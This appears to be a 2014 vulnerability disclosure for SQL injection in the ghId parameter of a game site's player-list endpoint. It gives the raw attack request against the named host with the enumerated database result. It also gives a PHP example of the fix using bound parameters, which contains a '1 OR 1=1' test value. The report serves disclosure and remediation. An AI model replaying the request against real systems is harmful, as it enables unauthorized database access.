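2014-10-10: Details reported to the vendor; awaiting the vendor's response.
2014-10-15: The vendor actively ignored the vulnerability; details disclosed to the public.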
Dangerous characters in user input are not properly sanitized.
Affected parameter: ghId

POST /activity/clan3/_do_getPlayerList.ajax.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://ms.linekong.com
Cookie: PHPSESSID=oon708apra935clk8l8a78cck0
Host: ms.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

ghId=*&page=1
Database: ms_web [57 tables]
Use parameterized SQL statements.
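The recommended fix applied to a handler shaped like the reported endpoint, as an added example that is not the vendor's code. The `players` table, its columns, the page size and the assumption that `ghId` and `page` are positive integers are hypothetical.

```php
<?php
// Added example: table, columns and page size are hypothetical.
const PAGE_SIZE = 2;

/** Validate a request field as a positive integer; returns null when invalid. */
function positiveInt($raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

function getPlayerList(PDO $db, array $post): array
{
    $ghId = positiveInt($post['ghId'] ?? null);
    $page = positiveInt($post['page'] ?? 1);
    if ($ghId === null || $page === null) {
        return ['status' => 400, 'rows' => []];   // reject instead of guessing
    }
    // Placeholders keep request values out of the SQL text entirely.
    $stmt = $db->prepare(
        'SELECT name FROM players WHERE gh_id = :gh ORDER BY id LIMIT :lim OFFSET :off'
    );
    // PARAM_INT matters for LIMIT/OFFSET: MySQL rejects quoted strings there.
    $stmt->bindValue(':gh', $ghId, PDO::PARAM_INT);
    $stmt->bindValue(':lim', PAGE_SIZE, PDO::PARAM_INT);
    $stmt->bindValue(':off', ($page - 1) * PAGE_SIZE, PDO::PARAM_INT);
    $stmt->execute();
    return ['status' => 200, 'rows' => $stmt->fetchAll(PDO::FETCH_COLUMN)];
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE players (id INTEGER PRIMARY KEY, gh_id INTEGER, name TEXT)');
$db->exec("INSERT INTO players (gh_id, name) VALUES (1,'alice'),(1,'bob'),(1,'carol'),(2,'dave')");

$cases = [
    ['ghId' => '1', 'page' => '1'],          // well-formed request
    ['ghId' => '1', 'page' => '2'],          // second page
    ['ghId' => '1 OR 1=1', 'page' => '1'],   // non-numeric input is refused
    ['page' => '1'],                         // missing ghId
];
foreach ($cases as $post) {
    $r = getPlayerList($db, $post);
    echo json_encode($post), ' => ', $r['status'], ' ', json_encode($r['rows']), PHP_EOL;
}
```

Type validation and bound parameters are independent layers: even if the validation were dropped, the bound value would be compared as data rather than parsed as SQL.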
Severity: No impact (ignored by vendor)
Ignored at: 2014-10-15 14:52
None yet